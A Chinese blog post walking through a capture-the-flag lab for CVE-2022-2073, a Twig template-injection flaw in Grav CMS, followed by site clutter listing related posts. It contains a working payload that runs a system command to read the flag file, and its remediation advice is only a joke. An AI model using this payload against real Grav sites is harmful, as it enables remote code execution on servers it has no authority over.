[漏洞复现]Grav CMS任意代码执行漏洞(CVE-2022-2073)

已于 2024-01-10 01:21:03 修改
阅读量546 收藏 10
点赞数 8
分类专栏: 漏洞复现 春秋云境靶场 文章标签: 安全
于 2024-01-10 00:00:00 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/k5664524/article/details/135477955
版权

Grav 是一个快速简单灵活的基于文件的 Web 平台。能够让你在家中轻松创建自己的网站,支持 Markdown 写作编辑,支持非常丰富的插件和主题,可用来写书、博客、图床、说明书等等。在 Github 上的 Star 达到 13.3k 。

一、漏洞介绍

Grav CMS 可以通过 Twig 来进行页面的渲染,使用了不安全的配置可以达到远程代码执行的效果,影响最新版 v1.7.34 以下的版本

二、漏洞复现

春秋云境.com一键梭哈

开启场景“启动原神”

进入靶场随便填,不要慌,错了有提示

用户名和密码有要求......

把我们的代码丢进去

{{['cat\x20/flag']|filter('system')}}

ok,访问首页,拿下

三、漏洞处置建议

把靶场关了,电脑关机,断网都行,怎么方便怎么来

free key
关注
  • 8
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
专栏目录
grav cms_利用Grav(现代的平面文件CMS)构建更快的网站
culi4814的博客
08-26 1337
grav cmsWe’ve recently featured a number of content management system (CMS) articles — on Perch and Craft (both database-driven options) and Statamic, a flat-file CMS. In this article, Ivaylo Gerchev ...
docker-getgrav:用于GRAV CMS的Docker映像
02-08
Grav-码头工人Docker容器。 该图像基于PHP fpm-buster图像。 您可以在找到源代码标签最新(当前为1.7) 最新产品(当前为1.7产品) 1.6 1.6。* 1.6产品1.6。*-prod 1.7 1.7。* 1.7产品1.7。*-prod用法这纯粹是基于...
Grav一个快速简单灵活基于文件的CMS
08-07
Grav - 一个快速、简单,灵活,基于文件的CMS
[春秋云镜]CVE-2022-2073
niubi707的博客
12-03 5400
春秋云镜CVE-2022-2073Grav CMS 可以通过 Twig 来进行页面的渲染,使用了不安全的配置可以达到远程代码执行的效果,影响最新版 v1.7.34 以下的版本
最新Web安全 EmpireCMS漏洞常见漏洞分析及复现_cms代码执行漏洞(1),绝对干货分享
最新发布
2401_84296945的博客
05-14 455
我们知道secure_file_priv这个参数在mysql的配置文件里起到的是能否写入的作用,当secure_file_priv = 为空,则可以写入sql语句到数据库,当secure_file_priv = NULL,则不可以往数据库里写sql语句,当secure_file_priv = /xxx,一个指定目录的时候,就只能往这个指定的目录里面写东西。网安所有方向的技术点做的整理,形成各个领域的知识点汇总,它的用处就在于,你可以按照上面的知识点去找对应的学习资源,保证自己学得较为全面。
CVE-2022-2073春秋云境.com
qq_42036164的博客
01-25 290
CVE-2022-2073春秋云境.com
春秋云镜 CVE-2022-2073
qq_22002773的博客
07-21 315
春秋云镜 CVE-2022-2073
ansible-grav:Ansible剧本,用于安装NGINX,PHP7-FPM和Grav CMS
05-17
这些配置来自Grav文档中显示的内容。 Master分支将安装Grav Admin'Vanilla'单页网站。 如果要尝试使用“ 氦骨架”站点,则需要克隆该分支。 说明。 当前支持最新版本的Amazon Linux , CentOS , Debian , ...
grav-plugin-blackhole:Grav CMS的静态站点生成器
04-29
Grav是一个空格术语,因此我认为此插件也应效仿。 时间停留在黑洞的事件视界上,这恰恰是此插件对您的网站的作用。 它将其冻结为一个状态。 通过将重力增加到无穷大,您会得到一个静态的黑洞,或者在这种情况下,您...
grav-theme-foundation:使用Foundation框架的Grav CMS响应式基本主题
02-03
基础 Foundation是使用Zurb的Foundation前端框架的... 在您的Grav安装目录的根目录中: bin/gpm install foundation这会将Foundation主题安装到Grav中的/user/themes目录中。 它的文件可以在/your/site/grav/user/them
grav-skeleton-rtfm-site:Grav RTFM骨架
02-04
总的来说,Grav-Skeleton-RTFM-Site是一个基于Grav CMS的文档站点骨架,旨在简化和技术性文档站点的创建流程。它利用Grav的灵活性和Markdown的易读性,为用户提供了一个高效且可自定义的文档平台。通过这个骨架,...
Grav:现代、简单且功能强大的平面文件 CMS-开源
06-22
Grav 是一个现代开源平面文件 CMS。 性能不仅仅是事后的想法,我们从一开始就将其融入其中。 Grav 拥有强大的 API 和复杂的包管理器,使其非常灵活。 Grav 是开源的,所有代码都可以在 GitHub.com 上找到。 Grav 管理插件提供了一个简单直观的界面,使配置和内容创建变得轻松愉快。 Grav 拥有令人惊叹的功能和工具,再加上大量详细的文档,让您看起来像个英雄开发者! 使用您最喜欢的 Markdown 编辑器在线或离线创建您的内容。 内置的包管理器可让您查找、安装和轻松更新 Grav 的扩展和主题。 Grav 智能地缓存内容以提供出色的性能,无论托管如何。 创建无限的分类法,例如标签、类别和作者,以过滤和管理您的内容。
Zresume一个GravCMS的程序员简历主题
08-11
轻量,无需数据库。直接使用 Markdown 编写简历,实时解析页面。简历所有图标、文字、排版均在 Markdown 中设置,无需修改代码。支持 Docker 一键部署,镜像体积约 30MB。
GVCLib__1.12.2__1.7.zip
04-05
我的世界少女前线mod,支持1.12.2的版本,需要forge14.23.4.2705版本才能正常运行
grav cms_Grav:构建快速灵活的网站
culuo8053的博客
08-07 487
grav cmsI've been friends with Djamil Legato for almost a decade. We were on the MooTools team in its early days, trying to forge a more useful way of working with JavaScript. Fast forward to today,...
CMS平台Grav搭建博客
wbsu2004的博客
01-12 1046
Grav 是一个快速简单灵活的基于文件的 Web 平台,可用来写书、博客、图床、说明书等等。
【春秋云境】CVE-2022-2073靶场WP和CVE-2022-1014靶场WP
果粒程
12-08 1553
【春秋云境】CVE-2022-2073靶场WP和CVE-2022-1014靶场WP
Web安全 | EmpireCMS漏洞常见漏洞分析及复现
Javachichi的博客
03-05 2014
本文将对EmpireCMS(帝国cms)的漏洞进行分析及复现
开源的公司网站搭建代码
06-08
有很多公司网站搭建的开源代码可以使用,以下是几个比较流行的选择: 1. WordPress:WordPress 是一个流行的开源网站建设和内容管理系统。它提供了许多主题和插件,可帮助你快速建立一个漂亮的公司网站。 2. Drupal:Drupal 是另一个流行的开源内容管理系统,它提供了很多功能强大的模块,可用于创建企业级网站。 3. Joomla:Joomla 是一个灵活的开源内容管理系统,它提供了大量的模板和扩展,可用于创建各种类型的网站,包括企业网站。 4. Ghost:Ghost 是一个用于博客和出版物的开源 CMS,它提供了简单的界面和工具,可用于创建专业的博客和出版物网站。 5. GravGrav 是一个现代化的开源平台,用于构建快速、安全和可扩展的网站。它提供了一个易于使用的管理面板和一个强大的插件生态系统。 以上这些开源平台都提供了很多主题和插件,可以帮助你快速建立一个漂亮的公司网站。你可以根据自己的需求选择其中一个,然后将其安装到自己的服务器上,并根据需要进行自定义配置和调整。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值